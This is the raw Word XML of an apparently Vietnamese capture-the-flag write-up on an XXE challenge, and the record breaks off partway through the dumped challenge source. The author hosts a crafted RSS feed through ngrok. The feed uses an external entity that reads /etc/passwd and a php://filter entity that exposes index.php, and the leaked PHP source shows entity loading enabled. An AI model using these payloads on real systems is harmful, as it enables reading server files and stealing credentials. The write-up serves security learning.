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E9B9" w14:textId="4FF0EE3F" w:rsidR="002F49FE" w:rsidRDefault="004F5D4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mục tiêu của bài này là lấy được mật khẩu  của admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F0CF69" w14:textId="644C75CD" w:rsidR="004F5D4C" w:rsidRDefault="004F5D4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đa số các bài XXE , dữ liệu được gửi đi ở định dạng XML. Nhưng bài này nhận đầu vào là 1 url.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64501422" w14:textId="6F21544F" w:rsidR="004F5D4C" w:rsidRDefault="004F5D4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CAC537B" w14:textId="20347F1E" w:rsidR="004F5D4C" w:rsidRDefault="004F5D4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mình thử gửi url sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="004F5D4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://www.youtube.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F5D4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML document is not valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD73CC" w14:textId="47D8575C" w:rsidR="004F5D4C" w:rsidRDefault="009461FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ứng dụng sẽ fetch cái url rồi phân tích tài liệu XML để phản hồi cho người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C4C6C" w14:textId="742CA991" w:rsidR="009461FE" w:rsidRDefault="009461FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707213D0" w14:textId="6D6323AA" w:rsidR="009461FE" w:rsidRDefault="009461FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình thử tạo 1 tài liệu XML bằng pastebin cx không được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5C2DE4" w14:textId="5E59447D" w:rsidR="009461FE" w:rsidRDefault="009461FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A56640" w14:textId="675B5B52" w:rsidR="009461FE" w:rsidRDefault="009461FE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phải làm sao để ứng dụng xử lí tài liệu XML?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB5192" w14:textId="310518BE" w:rsidR="001B033D" w:rsidRDefault="001B033D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B930E89" w14:textId="57CD931D" w:rsidR="001B033D" w:rsidRDefault="001B033D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình tìm hiểu thử RSS là gì??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0491A4B1" w14:textId="799B3628" w:rsidR="001B033D" w:rsidRDefault="00FB34C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSS feed là 1 loại tập tin XML giúp tạo ra kênh tóm tắt thông tin  (feed) để người đọc dễ dàng update và tìm kiếm nội dung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52798821" w14:textId="1B682D89" w:rsidR="00FB34C6" w:rsidRDefault="00FB34C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE516C1" w14:textId="1294F367" w:rsidR="00D60A2A" w:rsidRDefault="00FB34C6" w:rsidP="00D60A2A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Để tạo 1 RSS feed bạn vào trang </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB34C6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://rss.app/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Mình thử</w:t>
      </w:r>
      <w:r w:rsidR="00D60A2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tạo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> với trang W3S</w:t>
      </w:r>
      <w:r w:rsidR="00D60A2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D60A2A" w:rsidRPr="00D60A2A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>https://rss.app/feeds/OLSecNX2r0DaSXmH.xml</w:t>
      </w:r>
      <w:r w:rsidR="00D60A2A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74A7B93" w14:textId="7F73A957" w:rsidR="00D60A2A" w:rsidRDefault="00D60A2A" w:rsidP="00D60A2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13346106" w14:textId="411108BB" w:rsidR="00D60A2A" w:rsidRDefault="00D60A2A" w:rsidP="00D60A2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Để kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="00BB07BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tính hợp lệ của RSS feed vào trang </w:t>
      </w:r>
      <w:r w:rsidR="00BB07BA" w:rsidRPr="00BB07BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://validator.w3.org/feed/check.cgi?url=https%3A%2F%2Fpastebin.com%2Ftu4Gwmfw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60A4EE" w14:textId="72A3F049" w:rsidR="00D60A2A" w:rsidRDefault="00D60A2A" w:rsidP="00D60A2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A7A88E" w14:textId="611DC8B3" w:rsidR="00FB34C6" w:rsidRDefault="00BB07B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Mình thử gửi url trên thì ứng dụng trả về 1 bản tóm tắt của trang W3S </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB07BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA96649" w14:textId="53C5EC37" w:rsidR="00BB07BA" w:rsidRDefault="00BB07BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B03D0D2" w14:textId="3EF2301F" w:rsidR="00BB07BA" w:rsidRDefault="00BB07B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Tiếp theo mình phải tự tạo RSS Feed để khai thác XXE bằng cách tạo 1 file XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2CF40B" w14:textId="139B4196" w:rsidR="00BB07BA" w:rsidRDefault="00BB07BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462FC712" w14:textId="77777777" w:rsidR="00BB07BA" w:rsidRDefault="00BB07BA">
      <w:pPr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0"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="065EE0F5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F626" w14:textId="7AE1FEAA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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="7DC3A151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CB15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510A593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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="537D6105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D53C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&lt;!DOCTYPE title [ &lt;!ELEMENT title ANY &gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="74DA0EA9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F155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6C715FDB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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="7C3E8529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3524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&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="35ED6FBC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62FE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70E44162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2E63E5" w:rsidRPr="002E63E5" w14:paraId="31D94117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2E61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&lt;rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="619CC30F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E0F3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5F40F28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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="1D4B43EE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6347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&lt;channel&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="3B43DD24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D095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35876F0B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2E63E5" w:rsidRPr="002E63E5" w14:paraId="689A6FAF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BEFB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&lt;title&gt;The Blog&lt;/title&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="3DF2840C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77E0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1BC098A1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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="512B9636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0AEA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&lt;link&gt;http://example.com/&lt;/link&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="634B0C95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8257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12EAD2F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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="2C896135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6C3FC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&lt;description&gt;A blog about things&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="47212198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ECBF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D12A5A0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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="621C809B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CA0F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&lt;lastBuildDate&gt;Mon, 03 Feb 2014 00:00:00 -0000&lt;/lastBuildDate&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="68F45A36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AE5F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0135B272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2E63E5" w:rsidRPr="002E63E5" w14:paraId="46ECFEDF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7751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&lt;item&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="02642433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88F0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6CD772B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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="6E95CF5E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80C5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&lt;title&gt;&amp;xxe;&lt;/title&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="572C38ED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4622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690CD3D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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="09603A50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81A4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&lt;link&gt;http://example.com&lt;/link&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="49120B65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B859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544BEC18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2E63E5" w:rsidRPr="002E63E5" w14:paraId="33FF3D2E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3CB7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&lt;description&gt;a post&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="2425F297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ADB8F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D84513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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="62CE78C5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EC8EA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lastRenderedPageBreak/>
              <w:t>&lt;author&gt;author@example.com&lt;/author&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="519F1C4D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0D83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600D9B46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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="07EC5076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BC74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&lt;pubDate&gt;Mon, 03 Feb 2014 00:00:00 -0000&lt;/pubDate&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="58641EF7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779B0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1404D541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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="7ECC82B3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EB31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&lt;/item&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="6A6E41F9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0D4F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22E5E917" w14:textId="77777777" w:rsidR="002E63E5" w:rsidRPr="002E63E5" w:rsidRDefault="002E63E5" w:rsidP="002E63E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="9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</w:tblGrid>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="5421B03C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E5F4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  <w:r w:rsidRPr="002E63E5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
              </w:rPr>
              <w:t>&lt;/channel&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E63E5" w:rsidRPr="002E63E5" w14:paraId="6DF70329" w14:textId="77777777" w:rsidTr="002E63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CB89" w14:textId="77777777" w:rsidR="002E63E5" w:rsidRPr="002E63E5" w:rsidRDefault="002E63E5" w:rsidP="002E63E5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3841252B" w14:textId="05EF7CE9" w:rsidR="002E63E5" w:rsidRDefault="002E63E5" w:rsidP="002E63E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E63E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
        <w:t>&lt;/rss&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9798F6" w14:textId="05D3F68E" w:rsidR="002E63E5" w:rsidRDefault="002E63E5" w:rsidP="002E63E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA64941" w14:textId="514BD341" w:rsidR="002E63E5" w:rsidRDefault="002E63E5" w:rsidP="002E63E5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Giải thích một chút về payload XXE này nhé:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F45621" w14:textId="77CE7CCB" w:rsidR="002E63E5" w:rsidRPr="002E63E5" w:rsidRDefault="002E63E5" w:rsidP="002E63E5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Khi nó tạo 1 bản tóm tắt của 1 trang web thì cái nó expose ra ngoài là thuộc tính title trong item nên mình phải tham chiếu đường dẫn file ở đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E96A8" w14:textId="4096876B" w:rsidR="00BB07BA" w:rsidRDefault="00BB07BA" w:rsidP="00BB07BA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6134CA14" w14:textId="7239A18B" w:rsidR="00BB07BA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Bài toán yêu cầu mình gửi url nên phải lưu file trong htdocs rồi bật apache lên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7366D" w14:textId="51EFC0D9" w:rsidR="00683E6F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5C62915" w14:textId="7D68A889" w:rsidR="00683E6F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Đường dẫn của nó là </w:t>
      </w:r>
      <w:r w:rsidRPr="00683E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost/project/index.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331698D1" w14:textId="135C77E9" w:rsidR="00683E6F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Nhưng khi mình truyền localhost thì nó sẽ tìm đúng cái local host của nó vì đây là địa chỉ cục bộ trong hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D70DE37" w14:textId="4E09C324" w:rsidR="00683E6F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79009C7" w14:textId="5EA7C8B0" w:rsidR="00683E6F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Mình phải expose địa chỉ ip ra ngoài internet bằng ngrok.</w:t>
      </w:r>
      <w:r w:rsidR="00260B8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Nó sẽ tạo 1 tên miền trỏ đến máy chủ cục bộ localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CADE54" w14:textId="32C026EA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0A1B627" w14:textId="15ED4855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4AFC9475" wp14:editId="2D1040DD">
            <wp:extent cx="6023113" cy="23616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93" b="62542"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6064818" cy="237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8ACA0" w14:textId="74BBD68E" w:rsidR="00683E6F" w:rsidRDefault="00683E6F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522E9D7" w14:textId="0771B872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0BDB100" w14:textId="137F68DB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RSS của mình sẽ lưu ở </w:t>
      </w:r>
      <w:r w:rsidRPr="00260B86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://0243-2a09-bac1-7ac0-10-00-245-50.ap.ngrok.io/project/index.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E65EF2" w14:textId="35D52509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CFA89CF" w14:textId="3B1F9E51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Thử kiểm tra tính hợp lệ của nó </w:t>
      </w:r>
      <w:r w:rsidRPr="00260B86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1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chúc mừng nó là RSS feed hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47096DC1" w14:textId="3CBA99F5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</w:p>
    <w:p w14:paraId="5DB12850" w14:textId="47F14D53" w:rsidR="00260B86" w:rsidRDefault="00260B8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Mình up thử lên bài toán</w:t>
      </w:r>
      <w:r w:rsidR="00E56C2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thì nó báo tài liệu XML không hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3035CF" w14:textId="478CF2B5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547DF8D" w14:textId="5BD28BE4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Sau một hồi kiểm tra thì đoán file /etc/passwd không tồn tại trong hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D95CD" w14:textId="7177D759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Thử với file index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D64F3" w14:textId="54667C3E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AB938AD" w14:textId="58D715DB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Nó báo 1 lỗi khác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6E5D7B" w14:textId="7B05193D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677CD63" w14:textId="3C0EC549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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
        <w:t xml:space="preserve">Warning: simplexml_load_string(): remote host file access not supported, file://index.php in /challenge/web-serveur/ch29/index.php on line 32 Warning: simplexml_load_string(file://index.php): failed to open stream: no suitable wrapper could be found in /challenge/web-serveur/ch29/index.php on line 32 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB36015" w14:textId="0579C1F3" w:rsidR="00E56C2C" w:rsidRDefault="00E56C2C" w:rsidP="00E56C2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B124339" w14:textId="77777777" w:rsidR="00E56C2C" w:rsidRPr="00E56C2C" w:rsidRDefault="00E56C2C" w:rsidP="00E56C2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2794B308" w14:textId="77777777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Dường như file index.php không thể mở bình thường được, mình thử với PHP wrapper nhé!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC27A41" w14:textId="77777777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0DA62609" w14:textId="76728A2E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&lt;!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=</w:t>
      </w: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index.php</w:t>
      </w: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" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232C0066" w14:textId="6A17FBEE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528C01D" w14:textId="313E2006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>Thành công, mình đã xem được source code của bài toán:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F6125" w14:textId="611E8F8C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75F396E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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B0B5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1D5E4B3E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echo '&lt;html&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45794611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echo '&lt;header&gt;&lt;title&gt;XXE&lt;/title&gt;&lt;/header&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881CB0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echo '&lt;body&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06567EA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echo '&lt;h3&gt;&lt;a href="?action=checker"&gt;checker&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="?action=auth"&gt;login&lt;/a&gt;&lt;/h3&gt;&lt;hr /&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45552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61DFE758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if ( ! isset($_GET['action']) ) $_GET['action']="checker";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB0DAF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5408CFEF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if($_GET['action'] == "checker"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711DEA19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23AABEF7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libxml_disable_entity_loader(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686CC33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libxml_use_internal_errors(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F896195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447153BD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echo '&lt;h2&gt;RSS Validity Checker&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA665DB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&lt;form method="post" action="index.php"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9E677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&lt;input type="text" name="url" placeholder="http://host.tld/rss" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F4F397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&lt;input type="submit" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37319EEE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&lt;/form&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AAD759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06141E5E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4CDDB5FE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if(isset($_POST["url"]) &amp;&amp; !(empty($_POST["url"]))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BB3CD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$url = $_POST["url"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DBA35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echo "&lt;p&gt;URL : ".htmlentities($url)."&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED4B1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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67526F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$ch = curl_init("$url");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D216F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curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC79C67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curl_setopt($ch, CURLOPT_TIMEOUT, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC80EBB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curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA0AC0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$inject = curl_exec( $ch );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB5A78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curl_close($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA6498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$string = simplexml_load_string($inject, null, LIBXML_NOENT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1DB2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if ( ! is_object($string) || !$string || !($string-&gt;channel) || !($string-&gt;channel-&gt;item)) throw new Exception("error"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07307EDF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6A7FF5FB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foreach($string-&gt;channel-&gt;item as $row){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C92E2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"&lt;br /&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6BD17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"===================================================";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F1174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"&lt;br /&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D5F7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htmlentities($row-&gt;title);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33242748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"&lt;br /&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D03C0D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"===================================================";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640996C0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"&lt;br /&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE928C0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    print "&lt;h4 style='color: green;'&gt;XML document is valid&lt;/h4&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CD4842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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B59E525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} catch (Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B875C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print "&lt;h4 style='color: red;'&gt;XML document is not valid&lt;/h4&gt;";</w:t>
      </w:r>
